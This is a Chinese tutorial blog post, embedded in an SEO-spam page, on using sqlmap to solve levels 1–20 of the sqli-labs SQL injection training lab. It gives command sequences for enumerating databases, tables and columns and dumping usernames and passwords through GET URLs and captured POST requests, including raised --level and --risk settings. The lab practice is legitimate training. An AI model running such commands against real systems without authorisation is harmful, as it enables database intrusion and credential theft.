当前位置: 首页 > news >正文

asp网站源码 怎么安装免费推广引流平台app

asp网站源码 怎么安装,免费推广引流平台app,网站导航字体大小,昆明做网站建设找谁这个星期我们用手动注入打了前20关靶场,今天我们用sqlmap直接梭哈前20关 1.介绍sqlmap sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL和SQL注入漏洞。 2.下载和使用sqlmap 官方下载地址:GitHub - sq…

这个星期我们用手动注入打了前20关靶场,今天我们用sqlmap直接梭哈前20关

1.介绍sqlmap

sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL和SQL注入漏洞。

2.下载和使用sqlmap

官方下载地址:GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool

下载压缩包,之后解压

那怎么使用呢???

打开sqlmap被解压到的地方,我解压到了F盘

直接在红色筐子里输入cmd,即可打开窗口使用sqlmap

3.sqlmap基本语法

sqlmap是由python写成

使用方法:python sqlmap.py -参数

常用用法

1.-h

-h是显示基本用法

语法:python sqlmap.py -h

2. -u

-u是基础参数,后面跟需要测试的URL,常用于GET类型的注入

语法:python sqlmap.py -u "URL"

3.--batch

--batch是,可以在所有需要用户手动输入的的部分(通常是询问执行yes还是no【样子是[Y/n]】),执行默认操作,不需要用户再输入

语法:python sqlmap.py -u "URL" --batch

4.--level 等级

--level是,测试等级,等级越高,测试越复杂,共有五级,当默认集数测试不出来时。可以提高等级。

语法:python sqlmap.py -u "URL" --level

其余我们在做中介绍。

4.解题

Less-1——Less-10(GET类型)

前十关解法相同,以第一关为例

1.库名  --dbs 查询库名

python sqlmap.py -u "http://sqli-labs-php7-master/Less-1/?id=1" --batch -dbs

 

2.表名   -D 表名 --tables 查询表名

python sqlmap.py -u "http://sqli-labs-php7-master/Less-1/?id=1" --batch -D security --tables

3.列名  -D 表名 -T 列名 --columns 查询列名

python sqlmap.py -u "http://sqli-labs-php7-master/Less-1/?id=1" --batch -D security -T users --columns

4.字段  -D 表名 -T 列名 -C 字段 --dump 查询字段

python sqlmap.py -u "http://sqli-labs-php7-master/Less-1/?id=1" --batch -D security -T users -C username,password --dump

 

要是这几关有的查询不出来,记得还有--level 等级,等级提升这一操作

Less-11——Less-17(POST基础注入)

从11关开始就需要bp抓包啦

创建一个文本文档在sqlmap文件夹中,将POST报文保存在文本文档中!

-r 代表文档

语法:python sqlmap.py -r 文本文档

1.库名

python sqlmap.py -r 11.txt --batch -dbs

 

2.表名

python sqlmap.py -r 11.txt --batch -D security --tables

 

3.列名

python sqlmap.py -r 11.txt --batch -D security -T users --columns

 

4.字段

python sqlmap.py -r 11.txt --batch -D security -T users -C username,password --dump

 

Less15-17这几关sqlmap跑的特别慢,大家耐心等待,17关记得输入一个用户名再抓包!

Less18——Less20

这几关会发现爆表爆不出来

提示让用--level --risk 前面介绍 level了,那什么是risk呢?

“risk”参数用于控制攻击的深度,数值越高,攻击的幅度越大,但也会增加攻击被发现的风险;

//库名

python sqlmap.py -r 18.txt --batch -dbs --level=3 --risk=3

 之后操作也是一样的!!!

工具注入还是十分方便,但是还是得熟练手工注入!!!! 

http://www.yayakq.cn/news/66990/

相关文章:

  • 建网站要花费多少钱asp网站加速
  • 北京网站建设公司哪个好制作网站的公司还能赚钱吗
  • thymeleaf做网站 seo玉溪网站网站建设
  • 做网站不赚钱定兴做网站的
  • 西峰住房和城乡建设局网站深圳12个区排名
  • 南昌网站建设一般多少钱一年东营大众网
  • 石家庄整站优化无锡定制化网站建设
  • 微商产品做网站服务器ip做网站
  • 怎么做网站管理设计广告用什么软件
  • 做网站的收益pk10网站怎么做
  • 山东省住房与建设厅网站大作设计网站官网登录入口
  • 留言网站怎么做个人养老保险怎么查询
  • 网站内链工作做足网站备案后名称怎么改
  • 凡科网站制作wordpress调用分类的所有子目录
  • 旅游类网站设计模板下载新建的网站需要维护吗
  • 网站解析时候让做别名一个空间可以绑定几个网站
  • 常熟做网站公司排名网站建设案列
  • 出口网站怎么做山东省住房和城乡建设厅二级建造师
  • 云集网站建设公司唐山哪里做网站
  • 购物网站 服务器 带宽 多大一站式服务门户
  • 盐山县网站建设中国建筑网官网校园招聘
  • 学做网站 空间 域名荣耀手机商城官方网
  • 古典lash网站带后台源码下载seo搜索引擎优化包邮
  • 南头网站建设用dw做一个简单的网页
  • wordpress 建多站传奇游戏网页版
  • 网站自适应布局宁波自助建网站
  • 某集团网站建设规划书wordpress怎么写html代码
  • 向雅虎提交网站创建个人微信公众号
  • 定制家具网站源代码网站开发使用的工具类
  • 郑州高端网站开发橱柜设计师培训